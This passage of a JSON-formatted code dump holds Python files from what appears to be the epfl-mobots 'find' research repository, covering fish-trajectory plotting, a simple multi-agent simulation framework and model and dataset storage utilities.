skipped += 1\n num_files.set_description(desc.format(skipped), refresh=True)\n continue\n comp_f = np.loadtxt(f.replace('_Real', '_{}'.format(k)))\n comp_f[comp_f <= 1e-40] = 0\n r_f[r_f <= 1e-40] = 0\n f_diff = r_f - comp_f\n\n cmap = matplotlib.cm.get_cmap('jet')\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n ax.contourf(r_xx, r_yy, np.abs(f_diff), levels=100, cmap=cmap)\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n\n plt.savefig(\n '/' + '/'.join(f.split('/')[:-1]) + '/occupancy_dist_diff_{}-{}.png'.format('Real', k))\n print('/'.join(f.split('/')\n [:-1]) + '/occupancy_dist_diff_{}-{}.png'.format('Real', k))\n input()\n plt.close()\n\n\ndef plot(exp_files, path, args):\n files = []\n for p in Path(path).rglob('f_Real.dat'):\n files.append(str(p))\n plot_grid_differences(files, path, args)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Visualize grid position differences')\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.4371327757835388,
"alphanum_fraction": 0.47740626335144043,
"avg_line_length": 35.56640625,
"blob_id": "00cbf7105de9d0e7b10887f929e99bec1e110f32",
"content_id": "455a574e4265ea379232c7847eae3e1b0bc96313",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9361,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 256,
"path": "/find/plots/dl_si_2021/individual_quantities.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom turtle import left, position\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\nimport find.plots.common as shared\n\nimport find.plots.spatial.resultant_velocity as rv\nimport find.plots.spatial.distance_to_wall as dtw\nimport find.plots.spatial.relative_orientation as relor\n\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator, FuncFormatter)\n\nROBOT_DATA = True\nTRAJNET_DATA = False\nPFW_DATA = False\nDISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = False\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = True\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = True\n# PFW_DATA = False\n# DISABLE_TOULOUSE = True\n\n\ndef reset_palette():\n if TRAJNET_DATA:\n shared._uni_pallete = [\"#000000\", \"#ed8b02\", \"#e74c3c\"]\n elif PFW_DATA:\n shared._uni_pallete = [\"#000000\", \"#D980FA\"]\n elif ROBOT_DATA:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#2596be\"]\n else:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#3498db\", \"#2ecc71\"]\n\n\ndef annot_axes(ax, xlabel, ylabel, xlim, ylim, xloc, yloc, yscale):\n ax.set_xlabel(xlabel)\n ax.set_xlim(xlim)\n ax.xaxis.set_major_locator(MultipleLocator(xloc[0]))\n ax.xaxis.set_minor_locator(MultipleLocator(xloc[1]))\n ax.tick_params(axis=\"x\", which='both',\n direction=\"in\")\n ax.tick_params(axis=\"x\", which='major', length=4.0, width=0.7)\n ax.tick_params(axis=\"x\", which='minor', length=2.0, width=0.7)\n\n ax.set_ylabel(ylabel)\n ylim = [e / yscale for e in ylim]\n ax.set_ylim(ylim)\n ax.get_yaxis().set_major_formatter(\n FuncFormatter(lambda x, p: '{:.1f}'.format(x * yscale, ',')))\n ax.yaxis.set_major_locator(MultipleLocator(yloc[0] / yscale))\n ax.yaxis.set_minor_locator(MultipleLocator(yloc[1] / yscale))\n ax.tick_params(which='both', bottom=True,\n left=True, right=True, top=True)\n ax.tick_params(axis=\"y\", which='both', direction=\"in\")\n ax.grid(False)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['rvel'] = []\n data[e]['distance_to_wall'] = []\n for p in pos:\n if e == 'Virtual (Toulouse)' and not DISABLE_TOULOUSE:\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif e == 'Virtual (Toulouse cpp)':\n positions = np.loadtxt(p)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n if e == 'Robot':\n velocities = Velocities([positions], 0.1).get()[0]\n else:\n velocities = Velocities([positions], args.timestep).get()[0]\n linear_velocity = np.array((velocities.shape[0], 1))\n tup = []\n dist_mat = []\n for i in range(velocities.shape[1] // 2):\n linear_velocity = np.sqrt(\n velocities[:, i * 2] ** 2 + velocities[:, i * 2 + 1] ** 2).tolist()\n tup.append(linear_velocity)\n\n distance = args.radius - \\\n np.sqrt(positions[:, i * 2] ** 2 +\n positions[:, i * 2 + 1] ** 2)\n dist_mat.append(distance)\n dist_mat = np.array(dist_mat).T\n\n data[e]['rvel'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n data[e]['distance_to_wall'].append(dist_mat)\n\n 
###############################################################################\n # Virtual\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.25, 'hspace': 0.38}\n )\n\n # velocity\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n\n reset_palette()\n ax[0] = rv.compute_resultant_velocity(sub_data, ax[0], args, [0, 41])\n yscale = 100\n ax[0] = annot_axes(ax[0],\n '$V$ (cm/s)', r'PDF $(\\times {})$'.format(yscale),\n # [0.0, 35.0], [0.0, 7.2],\n # [0.0, 35.0], [0.0, 22],\n [0.0, 35.0], [0.0, 9],\n [5, 2.5], [2, 1],\n yscale)\n\n # distance to wall\n distances = {}\n positions = {}\n for k in data.keys():\n distances[k] = data[k]['distance_to_wall']\n positions[k] = data[k]['pos']\n sub_data_d = distances.copy()\n sub_data_p = positions.copy()\n if 'Hybrid' in sub_data_d.keys():\n del sub_data_d['Hybrid']\n del sub_data_p['Hybrid']\n\n reset_palette()\n dtw.distance_plot(sub_data_d, sub_data_p, ax[1], args, [0, 25])\n yscale = 100\n ax[1] = annot_axes(ax[1],\n r'$r_w$ (cm)', r'PDF $(\\times {})$'.format(yscale),\n [0.0, 25.0], [0.0, 25],\n [5, 2.5], [5, 2.5],\n yscale)\n\n # relative angle to the wall\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n\n reset_palette()\n relor.relative_orientation_to_wall(sub_data, ax[2], args)\n yscale = 100\n ax[2] = annot_axes(ax[2],\n r'$\\theta_{\\rm w}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180], [0, 2.0],\n [90, 30], [0.5, 0.25],\n yscale)\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.055, top=0.965, right=0.985)\n plt.savefig(path + 'individual_quantities_virtual.png')\n\n ###############################################################################\n # Hybrid\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.25, 'hspace': 0.38}\n )\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n\n reset_palette()\n ax[0] = rv.compute_resultant_velocity(sub_data, ax[0], args, [0, 41])\n yscale = 100\n ax[0] = annot_axes(ax[0],\n '$V$ (cm/s)', r'PDF $(\\times {})$'.format(yscale),\n # [0.0, 35.0], [0.0, 7.2],\n # [0.0, 35.0], [0.0, 22],\n [0.0, 35.0], [0.0, 9],\n [5, 2.5], [2, 1],\n yscale)\n\n sub_data_d = distances.copy()\n sub_data_p = positions.copy()\n if 'Virtual' in sub_data_d.keys():\n del sub_data_d['Virtual']\n del sub_data_p['Virtual']\n if 'Virtual (Toulouse)' in sub_data_d.keys():\n del sub_data_p['Virtual (Toulouse)']\n del sub_data_d['Virtual (Toulouse)']\n\n reset_palette()\n dtw.distance_plot(sub_data_d, sub_data_p, ax[1], args, [0, 25])\n yscale = 100\n ax[1] = annot_axes(ax[1],\n r'$r_w$ (cm)', r'PDF $(\\times {})$'.format(yscale),\n [0.0, 25.0], [0.0, 25],\n [5, 2.5], [5, 2.5],\n yscale)\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n\n 
reset_palette()\n relor.relative_orientation_to_wall(sub_data, ax[2], args)\n yscale = 100\n ax[2] = annot_axes(ax[2],\n r'$\\theta_{\\rm w}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180], [0, 2.0],\n [90, 30], [0.5, 0.25],\n yscale)\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.055, top=0.965, right=0.985)\n plt.savefig(path + 'individual_quantities_hybrid.png')\n"
},
{
"alpha_fraction": 0.5847457647323608,
"alphanum_fraction": 0.5854237079620361,
"avg_line_length": 27.365385055541992,
"blob_id": "17b99969c6d4ecc8886aed41c3d84c3a971acdba",
"content_id": "69f4bb021e0598738e758d684e69feb937be4bf8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2950,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 104,
"path": "/find/simulation/simu/simulation/simulation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport warnings\nimport tqdm\nimport socket\nimport datetime\n\nfrom random import shuffle\n\n\nclass Simulation:\n def __init__(self, timestep, num_iterations, args={'stats_enabled': False, 'simu_dir_gen': True}):\n self._individual_list = []\n self._descriptor_list = []\n self._stat_list = []\n self._num_iterations = num_iterations\n self._current_iteration = 0\n self._args = args\n self._timestep = timestep\n self._dirname = ''\n\n if 'simu_dir_gen' in self._args.keys() and self._args['simu_dir_gen']:\n hostname = socket.gethostname()\n timestamp = datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")\n self._dirname = hostname + '_' + timestamp\n if not os.path.exists(self._dirname):\n os.makedirs(self._dirname)\n\n def get_simu(self):\n return self\n\n def add_individual(self, individual):\n self._individual_list.append(individual)\n return self\n\n def add_descriptor(self, desc):\n self._descriptor_list.append(desc)\n return self\n\n def add_stat(self, stat):\n self._stat_list.append(stat)\n return self\n\n def get_num_individuals(self):\n return len(self._individual_list)\n\n def get_individuals(self):\n return self._individual_list\n\n def get_num_iterations(self):\n return self._num_iterations\n\n def get_current_iteration(self):\n return self._current_iteration\n\n def get_dirname(self):\n return self._dirname\n\n def get_descriptors(self):\n return self._descriptor_list\n\n def get_stats(self):\n return self._stat_list\n\n def get_timestep(self):\n return self._timestep\n\n def _update(self):\n if 'stats_enabled' in self._args.keys() and self._args['stats_enabled']:\n for obj in self._stat_list:\n obj(self)\n\n for obj in self._descriptor_list:\n obj(self)\n\n def dump(self):\n if 'stats_enabled' in self._args.keys() and self._args['stats_enabled']:\n for obj in self._stat_list:\n obj.save()\n\n for obj in self._descriptor_list:\n obj.save()\n\n def spin_once(self):\n ind_ids = list(range(len(self._individual_list)))\n shuffle(ind_ids)\n for idx in ind_ids:\n self._individual_list[idx].run(self)\n\n if 'stats_enabled' in self._args.keys() and self._args['stats_enabled']:\n self._update()\n\n if self._current_iteration > self._num_iterations:\n warnings.warn(\n 'You have exceeded the number of iterations allocated for this simulation')\n\n self._current_iteration += 1\n\n def spin(self):\n for _ in tqdm.tqdm(range(self._num_iterations)):\n self.spin_once()\n\n if 'stats_enabled' in self._args.keys() and self._args['stats_enabled']:\n self.dump()\n"
},
{
"alpha_fraction": 0.5895196795463562,
"alphanum_fraction": 0.594856858253479,
"avg_line_length": 26.851350784301758,
"blob_id": "a332c88ebb69bffe0739df5db5656cdd373a87d0",
"content_id": "9d799fd367bce6d488c6b3a62bc930917bc2e898",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2061,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 74,
"path": "/find/simulation/simu/simulation/individual.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass Individual:\n _ind_id = 0\n\n def __init__(self, is_robot=False):\n self._is_robot = is_robot\n self._id = Individual._ind_id\n Individual._ind_id += 1\n self._position = None\n self._velocity = None\n self._acceleration = None\n self._position_history = None\n self._velocity_history = None\n\n def reset_ind_id():\n Individual._ind_id = 0\n\n def get_id(self):\n return self._id\n\n def get_position(self):\n return self._position\n\n def get_velocity(self):\n return self._velocity\n\n def get_acceleration(self):\n return self._acceleration\n\n def set_position(self, pos):\n self._position = pos\n\n def set_velocity(self, vel):\n self._velocity = vel\n\n def get_position_history(self):\n return self._position_history\n\n def get_velocity_history(self):\n return self._velocity_history\n\n def set_position_history(self, posh):\n self._position_history = posh\n self._position = self._position_history[-1, :]\n\n def set_velocity_history(self, velh):\n self._velocity_history = velh\n self._velocity = self._velocity_history[-1, :]\n\n def is_robot(self):\n return self._is_robot\n\n def run(self, simu):\n self.interact(simu)\n self.move(simu)\n self._history_update(simu)\n\n def interact(self, simu):\n assert False, 'You need to implement this function in a subclass'\n\n def move(self, simu):\n assert False, 'You need to implement this function in a subclass'\n\n def _history_update(self, simu):\n if self._position_history is None:\n self._position_history = np.empty((0, len(self._position)))\n self._velocity_history = np.empty((0, len(self._velocity)))\n else:\n self._position_history = np.vstack(\n (self._position_history, self._position.reshape(1, -1)))\n self._velocity_history = np.vstack(\n (self._velocity_history, self._velocity.reshape(1, -1)))\n"
},
{
"alpha_fraction": 0.7467249035835266,
"alphanum_fraction": 0.7467249035835266,
"avg_line_length": 20.809524536132812,
"blob_id": "053bc057cd3a59b187088cf596ac76fab542bada",
"content_id": "ef04dd7a6ccf2dbd69d21ab5ef62ffb45a1228f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 458,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 21,
"path": "/find/plots/trajectory_visualisation/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.trajectory_visualisation import visualise_trajectories\nfrom find.plots.trajectory_visualisation import trajectory_grid\n\nplot_dict = {\n 'visualise_trajectories': visualise_trajectories.plot,\n 'trajectory_grid': trajectory_grid.plot,\n}\n\nsource = 'trajectory_visualisation'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.43743908405303955,
"alphanum_fraction": 0.4564412534236908,
"avg_line_length": 40.88571548461914,
"blob_id": "f3af7536a55ff91ad8a1abf4fc7d1b7c38a2a0f8",
"content_id": "3864252253f7c9fa86f53fa3a7afe1cc42c8d02b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10262,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 245,
"path": "/find/plots/trajectory_visualisation/visualise_trajectories.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport glob\nimport random\nimport argparse\nimport numpy as np\nfrom tqdm import tqdm\nfrom PIL import Image\n\nimport find.plots as fp\nfrom find.utils.features import Velocities\nfrom find.utils.utils import compute_leadership\nfrom find.plots.common import *\n\nTOULOUSE_DATA = False\nTOULOUSE_CPP_DATA = False\n\n\ndef plot(foo, path, args):\n mpath = os.path.dirname(fp.__file__)\n\n # random select an experiment to visualise\n trajectories = []\n if args.traj_visualisation_list == 'random':\n files = glob.glob(args.path + '/generated/*_positions.dat')\n trajectories.append(np.loadtxt(random.choice(files)) * args.radius)\n else:\n files = args.traj_visualisation_list\n for f in files:\n if TOULOUSE_DATA:\n fi = open(f)\n # to allow for loading fortran's doubles\n strarray = fi.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n fi.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif TOULOUSE_CPP_DATA:\n positions = np.loadtxt(f)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(f) * args.radius\n trajectories.append(positions)\n\n # TODO: parallelise multiple visualisations ?\n for fidx, traj in enumerate(trajectories):\n vel = Velocities([traj], args.timestep).get()[0]\n\n if args.fish_like: # TODO: needs to be adjusted for more than 1 individuals\n pictures = {}\n\n if traj.shape[1] // 2 == 2:\n pictures[0] = []\n pictures[1] = []\n\n pictures[0].append(Image.open(\n mpath + '/res/fish_artwork_red_down.png'))\n pictures[0].append(Image.open(\n mpath + '/res/fish_artwork_red_up.png'))\n\n pictures[1].append(Image.open(\n mpath + '/res/fish_artwork_blue_down.png'))\n pictures[1].append(Image.open(\n mpath + '/res/fish_artwork_blue_up.png'))\n else:\n for ind in range(traj.shape[1] // 2):\n pictures[ind] = []\n pictures[ind].append(Image.open(\n mpath + '/res/fish_artwork_blue_down.png'))\n pictures[ind].append(Image.open(\n mpath + '/res/fish_artwork_blue_up.png'))\n\n # pick the range of trajectories to visualise\n if args.range is not None: # keep the timesteps defined by the CLI parameters\n idcs = list(map(int, args.range))\n traj = traj[idcs[0]:idcs[1], :]\n vel = vel[idcs[0]:idcs[1], :]\n\n fps = 1 // args.timestep\n # In case the user wants to produce smoother videos (s)he can opt to fill frames between actual data points\n if args.fill_between > 0:\n fps *= args.fill_between\n\n filled_traj = np.empty(\n ((traj.shape[0] - 1) * args.fill_between, 0))\n filled_vel = np.empty(((traj.shape[0] - 1) * args.fill_between, 0))\n\n for idx in range(traj.shape[1] // 2):\n ft = np.empty((0, 2))\n fv = np.empty((0, 2))\n for i in tqdm(range(traj.shape[0] - 1), desc='filling trajectories'):\n fill_x = np.linspace(\n traj[i, idx * 2], traj[i + 1, idx * 2], args.fill_between)\n fill_y = np.linspace(\n traj[i, idx * 2 + 1], traj[i + 1, idx * 2 + 1], args.fill_between)\n fill_vx = np.linspace(\n vel[i, idx * 2], vel[i + 1, idx * 2], args.fill_between)\n fill_vy = np.linspace(\n vel[i, idx * 2 + 1], vel[i + 1, idx * 2 + 1], args.fill_between)\n ft = np.vstack(\n (ft, np.vstack((fill_x, fill_y)).T))\n fv = np.vstack(\n (fv, np.vstack((fill_vx, fill_vy)).T))\n filled_traj = np.hstack((filled_traj, ft))\n filled_vel = np.hstack((filled_vel, fv))\n traj = np.vstack((filled_traj, traj[-1, :]))\n vel = np.vstack((filled_vel, vel[-1, :]))\n\n if args.info:\n _, leadership_mat = compute_leadership(traj, vel)\n leadership_mat = 
np.array(leadership_mat)\n\n out_dir = path + '/' + os.path.basename(files[fidx]).split('.')[0]\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n tsteps = traj.shape[0]\n tail_beat_time = 0\n for i in tqdm(range(tsteps-1)):\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n for inum, j in enumerate(range(traj.shape[1] // 2)):\n x = traj[i, j * 2]\n y = traj[i, j * 2 + 1]\n\n if not args.fish_like:\n plt.scatter(x, y, marker='.',\n label='Individual ' + str(inum) + ' ' + \"{:.2f}\".format(x) + ' ' + \"{:.2f}\".format(y))\n else:\n phi = np.arctan2(vel[i, j * 2 + 1],\n vel[i, j * 2]) * 180 / np.pi\n\n if tail_beat_time < (args.tail_period * fps) / 2:\n rimage = pictures[j][0].rotate(phi)\n else:\n rimage = pictures[j][1].rotate(phi)\n\n ax.imshow(rimage, extent=[x - 0.035, x + 0.035, y -\n 0.035, y + 0.035], aspect='equal')\n tail_beat_time += 1\n if tail_beat_time > args.tail_period * fps:\n tail_beat_time = 0\n\n if args.info:\n plt.quiver(\n x, y, vel[i, j * 2], vel[i, j * 2 + 1], scale=1, units='xy')\n\n if args.dark:\n color = 'white'\n else:\n color = 'black'\n flag = leadership_mat[i, 1] == j\n plt.text(-0.29, 0.25, 'Geometrical leader:',\n color=color, fontsize=7)\n plt.text(-0.29, 0.23, 'Geometrical follower:',\n color=color, fontsize=7)\n if flag:\n x = -0.14\n y = 0.254\n ax.imshow(pictures[j][0], extent=[x - 0.035, x + 0.035, y -\n 0.035, y + 0.035], aspect='equal')\n else:\n x = -0.14\n y = 0.234\n ax.imshow(pictures[j][0], extent=[x - 0.035, x + 0.035, y -\n 0.035, y + 0.035], aspect='equal')\n\n if args.dark:\n color = 'white'\n else:\n color = 'black'\n outer = plt.Circle(\n args.center, args.radius*1.015, color=color, fill=False)\n ax.add_artist(outer)\n\n ax.axis('off')\n ax.set_xlim([-args.radius*1.05, args.radius*1.05])\n ax.set_ylim([-args.radius*1.05, args.radius*1.05])\n plt.tight_layout()\n\n png_fname = out_dir + '/' + str(i).zfill(6)\n if args.range:\n png_fname = out_dir + '/' + str(args.range[0] + i).zfill(6)\n plt.savefig(\n str(png_fname) + '.png',\n transparent=True,\n dpi=300\n )\n plt.close('all')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Visualise the positions of the fish accompanied by the feature information')\n parser.add_argument('--traj_visualisation_list',\n type=str,\n nargs='+',\n help='List of files to visualise',\n default='random',\n required=False)\n parser.add_argument('--fish_like', action='store_true',\n help='Images instead of points',\n default=False)\n parser.add_argument('--turing', action='store_true',\n help='Same image for all individuals to perform a turing test',\n default=False)\n parser.add_argument('--info', action='store_true',\n help='Display info',\n default=False)\n parser.add_argument('--dark', action='store_true',\n help='Render dark friendly icons',\n default=False)\n parser.add_argument('--exclude_index', '-e', type=int,\n help='Index of the virtual individual',\n required=False,\n default=-1)\n parser.add_argument('--range', nargs='+',\n help='Vector containing the start and end index of trajectories to be plotted',\n required=False)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--fill_between', type=int,\n help='Fill frames between timesteps',\n default=0,\n required=False)\n parser.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups 
used',\n default=[0.0, 0.0],\n required=False)\n parser.add_argument('--tail_period',\n type=float,\n help='Tail frequency to change the image of the fish (only used in fish_like)',\n default=0.5,\n required=False)\n\n args = parser.parse_args()\n\n plot(None, './', args)\n"
},
{
"alpha_fraction": 0.4786488115787506,
"alphanum_fraction": 0.49362650513648987,
"avg_line_length": 37.74074172973633,
"blob_id": "d92680aa3f46ad02034d5a8119a9382327080c04",
"content_id": "4e4a67f5ec3117398bb99acc3f09c0a6f83e528f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3138,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 81,
"path": "/find/plots/trajectory_visualisation/trajectory_grid.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport glob\nimport random\nimport argparse\nimport numpy as np\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\n\ndef plot(foo, path, args):\n trajectories = []\n if args.traj_visualisation_list == 'random':\n files = glob.glob(args.path + '/generated/*_positions.dat')\n trajectories.append(np.loadtxt(random.choice(files)) * args.radius)\n else:\n files = glob.glob(args.traj_visualisation_list)\n for f in files:\n trajectories.appened(np.loadtxt(f) * args.radius)\n\n for fidx, traj in enumerate(trajectories):\n vel = Velocities([traj], args.timestep).get()[0]\n lb, ub = 0, traj.shape[0]\n if args.range:\n lb, ub = args.range\n\n rvelocities = []\n for ind in range(traj.shape[1] // 2):\n for i in range(traj.shape[0]):\n r = np.sqrt(vel[i, ind * 2 + 1] ** 2 +\n vel[i, ind * 2] ** 2 -\n 2 * np.abs(vel[i, ind * 2 + 1]) * np.abs(vel[i, ind * 2]) * np.cos(\n np.arctan2(vel[i, ind * 2 + 1], vel[i, ind * 2])))\n rvelocities.append(r)\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n outer = plt.Circle(\n args.center, args.radius, color='white', fill=False)\n ax.add_artist(outer)\n plt.plot(traj[lb:ub, ind * 2],\n traj[lb:ub, ind * 2 + 1], linewidth=0.2)\n ax.set_xlim([-args.radius*1.05, args.radius*1.05])\n ax.set_ylim([-args.radius*1.05, args.radius*1.05])\n plt.savefig(path + os.path.basename(files[fidx]) + '.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Visualize the positions')\n parser.add_argument('--traj_visualisation_list',\n type=str,\n nargs='+',\n help='List of files to visualise',\n default='random',\n required=False)\n parser.add_argument('--exclude_index', '-e', type=int,\n help='Index of the virtual individual',\n required=False,\n default=-1)\n parser.add_argument('--timesteps', '-t', type=int,\n default=-1,\n help='Timesteps to use in the plot',\n required=False)\n parser.add_argument('--range', nargs='+',\n help='Vector containing the start and end index of trajectories to be plotted',\n required=False)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups used',\n default=[0.0, 0.0],\n required=False)\n args = parser.parse_args()\n\n plot(None, './', args)\n"
},
{
"alpha_fraction": 0.5763199329376221,
"alphanum_fraction": 0.5797176957130432,
"avg_line_length": 33.78181838989258,
"blob_id": "b5c454dfbb6e62128046f4089f9090389a50f956",
"content_id": "0da24b20ee81f88394071b9a9a97069e1bb4093f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3826,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 110,
"path": "/find/models/storage.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import os\nimport pickle\nimport shutil\nimport numpy as np\nimport tensorflow as tf\nimport torch\n\n\nclass ModelStorage:\n training_filename = 'training_{type}'\n val_filename = 'val_{type}'\n test_filename = 'test_{type}'\n\n training_path = '/train'\n val_path = '/val'\n test_path = '/test'\n checkpoint_path = '/model_checkpoint'\n logs_path = '/logs'\n\n def __init__(self, path, create_dirs=True):\n self._path = path\n\n if create_dirs:\n self.create_dirs(self._path + self.checkpoint_path)\n self.create_dirs(self._path + self.logs_path)\n self.create_dirs(self._path + self.training_path)\n self.create_dirs(self._path + self.val_path)\n self.create_dirs(self._path + self.test_path)\n\n def create_dirs(self, fullpath, remove_existing=False):\n if remove_existing and os.path.exists(fullpath):\n shutil.rmtree(fullpath)\n if not os.path.exists(fullpath):\n os.makedirs(fullpath)\n\n def _save_keras_model(self, model, epoch):\n if epoch >= 0:\n model.save(self._path + self.checkpoint_path + '/model_' +\n str(epoch) + '.h5')\n else:\n model.save(self._path + self.checkpoint_path + '/model.h5')\n\n def _load_keras_model(self, path, args):\n import find.models.tf_activations as tfa\n import find.models.tf_losses as tfl\n\n custom_objects = {\n 'Y': np.empty((0, 2)),\n }\n\n for k, v in tfl.losses.items():\n custom_objects[k] = v\n for k, v in tfa.activations.items():\n custom_objects[k] = v\n\n return tf.keras.models.load_model(path, custom_objects=custom_objects)\n\n def _load_trajnet_model(self, path, args):\n return torch.load(path)\n\n def save_model(self, model, model_backend, args, epoch=-1):\n if not epoch % args.dump == 0:\n return\n\n if model_backend == 'keras':\n self._save_keras_model(model, epoch)\n\n def load_model(self, path, model_backend, args):\n if model_backend == 'keras':\n return self._load_keras_model(path, args)\n if model_backend == 'trajnet':\n return self._load_trajnet_model(path, args)\n\n def save_sets(self, train, val, test):\n self.create_dirs(self._path + self.training_path, True)\n self.create_dirs(self._path + self.val_path, True)\n self.create_dirs(self._path + self.test_path, True)\n\n with open(self._path + self.training_path + '/' + self.training_filename.replace('{type}', 'inputs') + '.pkl', 'wb') as f:\n pickle.dump(train[0], f)\n\n with open(self._path + self.training_path + '/' + self.training_filename.replace('{type}', 'outputs') + '.pkl', 'wb') as f:\n pickle.dump(train[1], f)\n\n with open(self._path + self.val_path + '/' + self.val_filename.replace('{type}', 'inputs') + '.pkl', 'wb') as f:\n pickle.dump(val[0], f)\n\n with open(self._path + self.val_path + '/' + self.val_filename.replace('{type}', 'outputs') + '.pkl', 